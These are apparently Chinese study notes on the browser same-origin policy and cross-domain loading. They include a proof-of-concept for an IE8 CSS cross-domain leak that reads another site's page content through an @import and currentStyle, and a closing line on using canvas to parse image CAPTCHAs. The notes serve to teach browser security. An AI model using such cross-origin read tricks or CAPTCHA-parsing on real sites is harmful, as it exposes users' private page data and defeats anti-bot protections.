一,浏览器的同源策略
1.为网站安全性考虑,是浏览器最基本的安全策略;限制俩只不同源的document脚本对当前的document脚本读取或设置某些属性
2. 但是在浏览器中,某些标签是可以跨域加载资源:<script>.,<img><iframe><link>,利用这些标签加载其他未知文件会导致网站陷入不安全中
3. xmlhttprequest收到同源策略的约束,不能跨域访问资源。
4. ie8 css的跨域漏洞:http://www.2cto.com/Article/201009/73046.html
example:
POC:
www.a.com/test.html:
<body>
{}body{fontFamily:
aaaaaaaaaaaaaa
bbbbbbbbbbbbbbbb
</body>
www.b.com/test2.html:
<style>
@import url("http://www.a.com/test.html");
</style>
<script>
setTimeout(function(){
var t = document.body.currentStyle.fontFamily;
alert(t);
},2000);
</script>
5.防护措施:浏览器的沙箱模式;恶意网址拦截;EV证书
二:html5的canvas标签可以解析图片验证码